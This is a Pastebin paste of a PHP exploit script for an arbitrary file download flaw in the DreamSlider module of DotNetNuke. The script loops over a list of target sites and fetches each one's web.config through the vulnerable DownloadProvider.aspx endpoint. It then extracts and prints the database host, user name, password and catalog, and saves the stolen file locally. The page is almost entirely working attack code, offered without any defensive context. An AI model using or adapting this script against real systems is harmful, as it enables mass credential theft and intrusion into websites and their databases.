daily pastebin goal
62%
SHARE
TWEET

dotNetNuke DreamSlider Arbitrary File Download

AgusSR Dec 30th, 2017 (edited) 707 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. Class IDX_dotNetNuke {
  3.     public $url;
  4.  
  5.     public function validUrl() {
  6.         if(!preg_match("/^http:\/\//", $this->url) AND !preg_match("/^https:\/\//", $this->url)) {
  7.             $url = "http://".$this->url;
  8.             return $url;
  9.         } else {
  10.             return $this->url;
  11.         }
  12.     }
  13.  
  14.     public function curl($url, $data = null, $headers = null, $cookie = true) {
  15.         $ch = curl_init();
  16.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
  17.               curl_setopt($ch, CURLOPT_URL, $url);
  18.               curl_setopt($ch, CURLOPT_USERAGENT, md5(uniqid()));
  19.               //curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
  20.               curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
  21.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
  22.               curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  23.               curl_setopt($ch, CURLOPT_TIMEOUT, 5);
  24.  
  25.         if($data !== null) {
  26.               curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
  27.               curl_setopt($ch, CURLOPT_POST, TRUE);
  28.               curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
  29.         }
  30.  
  31.         if($headers !== null) {
  32.               curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
  33.         }
  34.  
  35.         if($cookie === true) {
  36.               curl_setopt($ch, CURLOPT_COOKIE, TRUE);
  37.               curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
  38.               curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
  39.         }
  40.  
  41.         $exec = curl_exec($ch);
  42.         $info = curl_getinfo($ch);
  43.  
  44.               curl_close($ch);
  45.  
  46.         return (object) [
  47.             "response"  => $exec,
  48.             "info"      => $info
  49.         ];
  50.  
  51.     }
  52.  
  53.     public function getValue($param, $kata1, $kata2) {
  54.         if(strpos($param, $kata1) === FALSE) return FALSE;
  55.         if(strpos($param, $kata2) === FALSE) return FALSE;
  56.         $start = strpos($param, $kata1) + strlen($kata1);
  57.         $end = strpos($param, $kata2, $start);
  58.         $return = substr($param, $start, $end - $start);
  59.         return $return;
  60.     }
  61.  
  62.     public function exploit() {
  63.         $url = $this->url;
  64.         $url = $this->validUrl();
  65.  
  66.         $file = "~/web.config";
  67.         $get  = $this->curl($url."/DesktopModules/DreamSlider/DownloadProvider.aspx?File=".$file);
  68.  
  69.         while($get->response === false) {}
  70.  
  71.         preg_match("/Data Source=(.*?)/i", $get->response, $host);
  72.         preg_match("/User ID=(.*?);/i", $get->response, $user);
  73.         $pass = $this->getValue($get->response, ";Password=" , "\"");
  74.         preg_match("/Initial Catalog=(.*?);/i", $get->response, $db);
  75.  
  76.         print "[>] Host: ".$host[1]." | User: ".$user[1]." | Pass: ".$pass." | Db: ".$db[1]." \n";
  77.         print "[>] ".parse_url($this->url, PHP_URL_HOST)."_web.config saved!\n\n";
  78.         $this->save($get->response);
  79.        
  80.     }
  81.  
  82.     public function save($data) {
  83.         $handle = fopen(parse_url($this->url, PHP_URL_HOST)."_web.config", "w");
  84.         fwrite($handle, $data);
  85.         fclose($handle);
  86.     }
  87. }
  88.  
  89. $dotNetNuke = new IDX_dotNetNuke();
  90.  
  91. if(!isset($argv[1])) die("!! Usage: php ".$argv[0]." target.txt");
  92. if(!file_exists($argv[1])) die("!! File target ".$argv[1]." tidak di temukan!!");
  93. $open = explode("\n", file_get_contents($argv[1]));
  94.  
  95. foreach($open as $list) {
  96.     $dotNetNuke->url = trim($list);
  97.     $dotNetNuke->url = $dotNetNuke->validUrl();
  98.  
  99.     print "[*] Exploiting ".parse_url($dotNetNuke->url, PHP_URL_HOST)."\n";
  100.     $dotNetNuke->exploit();
  101. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top